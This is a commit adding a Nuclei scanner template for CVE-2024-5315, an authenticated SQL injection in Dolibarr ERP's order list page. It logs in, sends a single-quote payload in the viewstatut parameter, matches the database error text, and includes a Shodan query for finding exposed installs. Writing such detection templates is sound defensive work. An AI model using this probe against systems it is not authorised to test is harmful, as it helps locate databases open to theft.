commit
25b93c84bf
|
@ -0,0 +1,59 @@
|
|||
id: CVE-2024-5315
|
||||
|
||||
info:
|
||||
name: Dolibarr ERP CMS `list.php` - SQL Injection
|
||||
author: rootxharsh,iamnoooob,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
|
||||
impact: |
|
||||
These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-5315
|
||||
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 9.1
|
||||
cve-id: CVE-2024-5315
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.09367
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.title:"Dolibarr"
|
||||
tags: cve,cve2024,dolibarr,erp,sqli,authenticated
|
||||
|
||||
variables:
|
||||
username: "{{username}}"
|
||||
password: "{{password}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /htdocs/index.php?mainmenu=home HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginfunction=loginfunction&username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- You have an error in your SQL syntax
|
||||
|
||||
- type: word
|
||||
part: header_1
|
||||
words:
|
||||
- 'Set-Cookie: DOLSESSID_'
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- SuperAdmin
|
Loading…
Reference in New Issue